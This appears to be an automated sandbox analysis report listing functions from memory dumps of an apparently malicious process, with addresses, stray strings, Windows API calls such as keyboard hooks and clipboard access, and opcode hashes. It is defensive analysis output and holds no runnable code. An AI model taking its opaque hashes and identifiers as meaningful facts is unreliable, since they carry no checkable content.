Instruction Fuzzy Hash: 15916A71E00209DFDF14DFA9CD8579EBBF2AF88344F14C129E419AB294DB749985CB81

Uniqueness

Uniqueness Score: -1.00%

Function 233D47A8 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPvq, xrefs: 233D48F9
\Ovq, xrefs: 233D4983
fvq, xrefs: 233D47D3

Memory Dump Source

Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233d0000_wab.jbxd

Similarity

API ID:
String ID: fvq$XPvq$\Ovq
API String ID: 0-1140148533
Opcode ID: 795954637d4a155043542d99d89f168aae861b2c0abb2e9ef0f87b01a54238b9
Instruction ID: d2809816595a259df9585bceeca33da04072af8f442fe3f9073208266d69e805
Opcode Fuzzy Hash: 795954637d4a155043542d99d89f168aae861b2c0abb2e9ef0f87b01a54238b9
Instruction Fuzzy Hash: CF618D32B042089FDB149FA5C954BAEBAF6EF88310F208469E506EB395DF758D418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A79111 Relevance: 3.1, Strings: 2, Instructions: 556
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

z", xrefs: 00A794FE
<z", xrefs: 00A7952E

Memory Dump Source

Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_wab.jbxd

Similarity

API ID:
String ID: <z"$z"
API String ID: 0-742603914
Opcode ID: 613c8bb49b86cd9ab0835e776e50b66e231c32dcd91763a033d47fdb37cf4c3b
Instruction ID: 138cce1783f3f4d7c47c2a6978c8f9626027ea9ba9d43a93bd4ad2a161c31cc9
Opcode Fuzzy Hash: 613c8bb49b86cd9ab0835e776e50b66e231c32dcd91763a033d47fdb37cf4c3b
Instruction Fuzzy Hash: 6F1263717442218FCB199B78D89462D73A2EBCA356F11CD2AF809CB355DE39DC878B81

Uniqueness

Uniqueness Score: -1.00%

Function 00A7F548 Relevance: 2.9, Strings: 2, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teqq, xrefs: 00A7F8AB
Teqq, xrefs: 00A7F601

Memory Dump Source

Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_wab.jbxd

Similarity

API ID:
String ID: Teqq$Teqq
API String ID: 0-4106862103
Opcode ID: 71bee4eda10822d5300433df708b5ee237d691be11c5ed8ff4e15ea06a18a14f
Instruction ID: 6ea2ed50db91247ee04546ff5a276f325eacb4cc0a4490299ecf2b8935326062
Opcode Fuzzy Hash: 71bee4eda10822d5300433df708b5ee237d691be11c5ed8ff4e15ea06a18a14f
Instruction Fuzzy Hash: E9E16D35A002158FDF28DF68C99066DB7B2FF89311F208569E40AEB365CB75DD46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 233D8D80 Relevance: 2.7, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$qq, xrefs: 233D8DF8
$qq, xrefs: 233D8E33

Memory Dump Source

Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233d0000_wab.jbxd

Similarity

API ID:
String ID: $qq$$qq
API String ID: 0-1516316326
Opcode ID: 940f2246779d306af9559729957772529d076312023b94f8f60129ba05f49649
Instruction ID: e64d8999df67692cb5248593c0e5fe792d053722857797012487b77ffe6e033e
Opcode Fuzzy Hash: 940f2246779d306af9559729957772529d076312023b94f8f60129ba05f49649
Instruction Fuzzy Hash: 26518071B4020A8FCF48DB34C990B6EB7F7AB88601F1088B9D419EB354EA34ED058BD1

Uniqueness

Uniqueness Score: -1.00%

Function 233D4799 Relevance: 2.6, Strings: 2, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPvq, xrefs: 233D48F9
fvq, xrefs: 233D47D3

Memory Dump Source

Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233d0000_wab.jbxd

Similarity

API ID:
String ID: fvq$XPvq
API String ID: 0-899226535
Opcode ID: ec31d46bf489b26bbeefa6447cc2000bd5d059f736fd5fa7cb699d472ec1b637
Instruction ID: 5fc7a4898ff13fdaf6420e8fbbeb7d02066ccf1ba68f760347d04d177d793f66
Opcode Fuzzy Hash: ec31d46bf489b26bbeefa6447cc2000bd5d059f736fd5fa7cb699d472ec1b637
Instruction Fuzzy Hash: 52518D72F002089FDB049FA5C954BAEBBF6BF88710F208569E506AB395DE759D018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A79990 Relevance: 2.2, Strings: 1, Instructions: 940
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8uZ `uZ , xrefs: 00A7A032

Memory Dump Source

Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_wab.jbxd

Similarity

API ID:
String ID: 8uZ `uZ
API String ID: 0-4087915542
Opcode ID: a6f9d864c1e8d614d8290ad0568e0efb0ffce69c0700d0c6c73577b74793ff25
Instruction ID: 148b5c96e98e22de48392e6035918eafcdbe675e1695452f61128152bbde0723
Opcode Fuzzy Hash: a6f9d864c1e8d614d8290ad0568e0efb0ffce69c0700d0c6c73577b74793ff25
Instruction Fuzzy Hash: A6829F34B802248FDB68DF24D590AAE77B2FB89311F1285A9D816D7364DF399C42CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A799A0 Relevance: 2.2, Strings: 1, Instructions: 934
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8uZ `uZ , xrefs: 00A7A032

Memory Dump Source

Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_wab.jbxd

Similarity

API ID:
String ID: 8uZ `uZ
API String ID: 0-4087915542
Opcode ID: e7a8a67b4830f4466df7cac1eace97cfc6c147b75c8c960ad86b2e54c675d2e3
Instruction ID: 844f06489f7b2a6164f20d6d476272150aea094d5fa1152024ece6056a2207b3
Opcode Fuzzy Hash: e7a8a67b4830f4466df7cac1eace97cfc6c147b75c8c960ad86b2e54c675d2e3
Instruction Fuzzy Hash: 70828F34B802258FDB68DF24D590AAE73B2FB89311F1285A9D816D7364DF399C42CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A7AB6C Relevance: 1.6, Strings: 1, Instructions: 370COMMON

Download Yara Rule

Strings

('z", xrefs: 00A7AC7C

Memory Dump Source

Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_wab.jbxd

Similarity

API ID:
String ID: ('z"
API String ID: 0-2037438512
Opcode ID: 1ec008ef4a63faa6f370c4f910d7e5fcb776511f2f7873513279b52d0706a2c3
Instruction ID: e8db079cf81c0bfc36db4baad71a4ea4e2ed15e1b62fd80352e35e23bd12a672
Opcode Fuzzy Hash: 1ec008ef4a63faa6f370c4f910d7e5fcb776511f2f7873513279b52d0706a2c3
Instruction Fuzzy Hash: DAD19171B002199FCB15DB68C994AAEBBF2EF98311F24C469E809DB355DB34DC42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 233C36C7 Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 233C37E2

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 80604049a279c28c7f28da0bc81f262c72be0f6c456869c5ed0105e960fad3d6
Instruction ID: f420d30154e20344ddfbb18fbe0aacf78d6e80a751ab7a33c08d882b105f5931
Opcode Fuzzy Hash: 80604049a279c28c7f28da0bc81f262c72be0f6c456869c5ed0105e960fad3d6
Instruction Fuzzy Hash: E751D0B1D003499FDB14CFA9C984ADEBBB1FF88310F24856AE819AB210D775A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 233C3670 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 233C37E2

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 229410bf94f037c6f9ddb70b5f08a463158b6f2826f80a412e62b79a706c9180
Instruction ID: cc0a9d99cedffa42f497940e03284b1d968696a441eed2d6017ae15c7da2a532
Opcode Fuzzy Hash: 229410bf94f037c6f9ddb70b5f08a463158b6f2826f80a412e62b79a706c9180
Instruction Fuzzy Hash: 9E51EEB0D003499FDB14CFA9C880ADEBBB1BF48310F24856AE819AB211D775A985CF94

Uniqueness

Uniqueness Score: -1.00%

Function 233C36D0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 233C37E2

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0c0b6242156d36a36bddbaa0aca055c94dcfe99fbc09fb3e13e06f3da3ce842e
Instruction ID: 8f8d3af34a359b7a399b4df4bdac60236b8550207f9602528d04baf95b3f86da
Opcode Fuzzy Hash: 0c0b6242156d36a36bddbaa0aca055c94dcfe99fbc09fb3e13e06f3da3ce842e
Instruction Fuzzy Hash: DC41CFB1D003499FDB14CFA9C984ADEFBB5FF48310F24852AE819AB210D775A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 233C81D6 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 233C8269

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 74c85550bffa3a247ee058a88cec51b4d2e5578fa9e3aa38f94c130d11172f75
Instruction ID: abae53ef78e65d3261ebea2c4212e8d512bb70e6f08dde7c0c23da59f05b8ac5
Opcode Fuzzy Hash: 74c85550bffa3a247ee058a88cec51b4d2e5578fa9e3aa38f94c130d11172f75
Instruction Fuzzy Hash: A9312BB9900745CFCB04DF89C488A9ABBF5FF88314F25C999E5199B321D734AA41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 233C8EEC Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 233C8F80

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 1d1f5637a23e22a7269c4d80ad9ede52d4b576fa102098e477f3ec8238bd1ee4
Instruction ID: 3fe5ca0d87d3ca465e1e10988e69f1f1ade9a96b6672a1e5e214ddd2645c4518
Opcode Fuzzy Hash: 1d1f5637a23e22a7269c4d80ad9ede52d4b576fa102098e477f3ec8238bd1ee4
Instruction Fuzzy Hash: 463101B0D01289DFDB10CFA9D984BCEBBF6AF48304F248499E505BB391CBB46A45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 233C88B8 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 233C8F80

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: c62154dd9c91d81938ad4becb03df116b2e8e721d92d06db99986a3e184d42aa
Instruction ID: a27eda9b67e7c50d5f311d3c9eed27331941f77a9c3469bfbb8bb92fdf813b4b
Opcode Fuzzy Hash: c62154dd9c91d81938ad4becb03df116b2e8e721d92d06db99986a3e184d42aa
Instruction Fuzzy Hash: 493120B0D00388DFDB10DF99D984B8EBBF6AF48304F248459E509BB390CBB06A45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 233C7310 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 233C739F

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f795b609196fc74c9c0c89629adff78c5f3f805b57356eabf7daeec29e876096
Instruction ID: 0b8dd906733fb918f784ebd07cc9f0254b6a67dc2acc6e6842d007652dd51d08
Opcode Fuzzy Hash: f795b609196fc74c9c0c89629adff78c5f3f805b57356eabf7daeec29e876096
Instruction Fuzzy Hash: BC2114B59002499FDB10CFA9D984AEEBFF5EB48320F14845AE959A3350C374A940CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 233C7318 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 233C739F

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a64fd9c6d61d3fcc967f88960e9e9c804e7beb3d62e65bfef824054141514040
Instruction ID: 60f13ebe3a62af50ac8d935642c18cb2b05028edad800ad67c0a76252bbbf73a
Opcode Fuzzy Hash: a64fd9c6d61d3fcc967f88960e9e9c804e7beb3d62e65bfef824054141514040
Instruction Fuzzy Hash: 8721E2B59002489FDB10CFAAD984ADEBBF4EB48320F14841AE959A7350D374AA54CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 233CA8E0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 233CA963

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 6eac6457be5849f94f7dbd59df876af8404336cbe746e681ec5ebc7d414779bd
Instruction ID: cee265418d54e490c0433a7caf00476fe5f46245d75a2e2210fd67b1751ad2fa
Opcode Fuzzy Hash: 6eac6457be5849f94f7dbd59df876af8404336cbe746e681ec5ebc7d414779bd
Instruction Fuzzy Hash: A32135B59002098FCB14DFA9C845BEEFBF1FF88310F148429D459A7250C774AA44CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 233CA8E8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 233CA963

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 562d477d0dcf8ce887ecb29d1160a19fcca1d4a5f6721fd154a3add952239adc
Instruction ID: 7d21baa0258156115c94a3e5133f24344f5c00aa3b8d0e0df9966fea3e3dae7f
Opcode Fuzzy Hash: 562d477d0dcf8ce887ecb29d1160a19fcca1d4a5f6721fd154a3add952239adc
Instruction Fuzzy Hash: D82127B59002499FCB14DF9AC945BDEFBF5EF88310F108419D459A7250C774A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 233C6ED8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,233C84BD), ref: 233C8547

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d926c9aaa54b932c30d526b4773cdd4bca16f2aded50a991ca27fc34aefbdb22
Instruction ID: ddd2a4906cbd0f286e9649c499e696ddb9df512d218a8d843c8323b14229548f
Opcode Fuzzy Hash: d926c9aaa54b932c30d526b4773cdd4bca16f2aded50a991ca27fc34aefbdb22
Instruction Fuzzy Hash: 43116AB18043998FCB10DF9AD444BDEBFF4EF89320F14849AD559AB351C374AA44CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 233C220A Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 233C2276

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0487d3cadac147195eca5aa6c500c8157f9bc645843a2088b928ace9346afe99
Instruction ID: 6f3126bb0a7862b3bfab8a99189ff63ea809a50c1fee55cf123134c8faccfac7
Opcode Fuzzy Hash: 0487d3cadac147195eca5aa6c500c8157f9bc645843a2088b928ace9346afe99
Instruction Fuzzy Hash: A011F3B6C006498ECB10DF9AC444BDEFBF1EF88310F14855AD869A7611C374A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 233C0B9C Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 233C2276

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ed05dd079e16d09c9a663dec3f72b439c7bee303bf44d182f4e8e9042547cc5d
Instruction ID: e9ee95174053665fc5120e23bbf3f76f506b1d87fec9d636e81ae9ba92aa2699
Opcode Fuzzy Hash: ed05dd079e16d09c9a663dec3f72b439c7bee303bf44d182f4e8e9042547cc5d
Instruction Fuzzy Hash: F511F0B68007498FCB10DF9AC844A9EFBF4EB89710F10856AD929A7210C375AA45CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 233C87A0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 233C8E05

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: ceb1c8792f77aba8d2e30a3b29e5bfc8517d8c7c5b4cf1d526616431a98892e0
Instruction ID: c28fd1dcdb96ff848841f7f79fa11a9a45d43d5f172c07236fea4b6bccf6c6cd
Opcode Fuzzy Hash: ceb1c8792f77aba8d2e30a3b29e5bfc8517d8c7c5b4cf1d526616431a98892e0
Instruction Fuzzy Hash: 751115B59003498FCB20DFAAD548BDEFBF4EB48320F108859D559A7211C375AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 233C879D Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 233C8E05

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 308534e9aeffdf61decdb7afeefa339da38f8befde95b61567e3388380efdf7f
Instruction ID: 1ee085a03f14ca2850a51406997b4140ac194c1b22bf0a6260d5a02a2c21ff34
Opcode Fuzzy Hash: 308534e9aeffdf61decdb7afeefa339da38f8befde95b61567e3388380efdf7f
Instruction Fuzzy Hash: EB1118B58003498FCB20DF9AC545BDEFBF4EB48310F148459D559A7311C375AA44CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 233C6EF4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,233C84BD), ref: 233C8547

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 8d9fc71f4ea457ef20f601b07e1a25f873036b2ca3e61eddc5a9e91d3295e6d7
Instruction ID: 1537a78663bf451173aad16b77caaf8ba17cb7e1c02c3406b47993d9a0efbd3b
Opcode Fuzzy Hash: 8d9fc71f4ea457ef20f601b07e1a25f873036b2ca3e61eddc5a9e91d3295e6d7
Instruction Fuzzy Hash: AD1133B18003498FCB20DF9AC484BDEFBF4EB48320F20845AE519A7240C774AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 233C8DA9 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 233C8E05

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: cef440e0c3acd05d1f34748092005be693f1adace782b45e266c6fbeb92adfb3
Instruction ID: 32f8c286ae2991e4dbc338514c60cf8187a107777948be4f6f822db1fc3e095e
Opcode Fuzzy Hash: cef440e0c3acd05d1f34748092005be693f1adace782b45e266c6fbeb92adfb3
Instruction Fuzzy Hash: C01145B18002498FCB20DFAAC585BDEFFF0EF88320F248959D559A7211C374AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 233C84E0 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,233C84BD), ref: 233C8547

Memory Dump Source

Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233c0000_wab.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 50bdef9d576ea7f0b138e7e2f04d0a074ff439336127d2f24822b85fe155081c
Instruction ID: 812d2ea9f0b5bb924f79c7616ed32a2f3f2fff6729957c88d1aea032866d3068
Opcode Fuzzy Hash: 50bdef9d576ea7f0b138e7e2f04d0a074ff439336127d2f24822b85fe155081c
Instruction Fuzzy Hash: 5A1103B5800249CFCB20DF9AD985BDEBBF4EB88320F20845AD559A7251C774AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A76F00 Relevance: 1.4, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

LRqq, xrefs: 00A76F36

Memory Dump Source

Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_wab.jbxd

Similarity

API ID:
String ID: LRqq
API String ID: 0-2392378202
Opcode ID: 15ce10e8291380a8a334b21602950900b385291c1736f55e0bbd7d56db7568c1
Instruction ID: 6f2944ac1730b08a9279c35709a8dc5e44d7a1ce610f066aa7992dc38de578b6
Opcode Fuzzy Hash: 15ce10e8291380a8a334b21602950900b385291c1736f55e0bbd7d56db7568c1
Instruction Fuzzy Hash: C6516D34714215CFCB04DB68D958AAE7BF2EF89315F2084A9E40AEB3A1DB75DC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 233DDAFD Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

PHqq, xrefs: 233DDC59

Memory Dump Source

Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233d0000_wab.jbxd

Similarity

API ID:
String ID: PHqq
API String ID: 0-2246444507
Opcode ID: 48e0fb75bc9b3d27d65f7c184ea428a7ef91da5d28704a18ec57211ca89e20d4
Instruction ID: 7c2008466424db8f30ec7cf51a6a22ef84d6d155b7b9ad56f3c1ee28a3ae0d30
Opcode Fuzzy Hash: 48e0fb75bc9b3d27d65f7c184ea428a7ef91da5d28704a18ec57211ca89e20d4
Instruction Fuzzy Hash: 5E41B672A00309DFDB15DF64C880B9EBBB6FF86300F24456AE405DB245DB74AA46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 233D2200 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHqq, xrefs: 233D233B

Memory Dump Source

Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233d0000_wab.jbxd

Similarity

API ID:
String ID: PHqq
API String ID: 0-2246444507
Opcode ID: 239fa1cbd1149a6d431c56387633b9ee771effc09eec488eeffbc44c706ab345
Instruction ID: 36b0786a0d554c27d549cf4b80c9178b2530196fca088c1eb24d4924d7470c38
Opcode Fuzzy Hash: 239fa1cbd1149a6d431c56387633b9ee771effc09eec488eeffbc44c706ab345
Instruction Fuzzy Hash: 00318F72B002098FDB49AB74C95466F7BA7BB89301F2444A8E406DB395EF35DE468790

Uniqueness

Uniqueness Score: -1.00%

Function 00A78B70 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

LRqq, xrefs: 00A78B9E

Memory Dump Source

Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_wab.jbxd

Similarity

API ID:
String ID: LRqq
API String ID: 0-2392378202
Opcode ID: 291c8b6cc02c53962bc30c1d9e55f80fe14b6f1ba6515f3f830f948ac7dd34e0
Instruction ID: b17231bbefb6691112db844ff93b763a5cec3f83226cf6d662f19e7a27a290a6
Opcode Fuzzy Hash: 291c8b6cc02c53962bc30c1d9e55f80fe14b6f1ba6515f3f830f948ac7dd34e0
Instruction Fuzzy Hash: 63317075E41209DBDB19CFA8C84879EB7B1FF85300F20C965E809E7250DB78AD45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A78B60 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

LRqq, xrefs: 00A78B9E

Memory Dump Source

Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_wab.jbxd

Similarity

API ID:
String ID: LRqq
API String ID: 0-2392378202
Opcode ID: 62c7d3757cd5c8fa2a12959db8a86de1e3b81a8e42d7ee270c8cbc8a640d4bf2
Instruction ID: 07781549c1e6f3caf3ad2ad51263d56ee2c28863da683c2e226fc0962fda7bea
Opcode Fuzzy Hash: 62c7d3757cd5c8fa2a12959db8a86de1e3b81a8e42d7ee270c8cbc8a640d4bf2
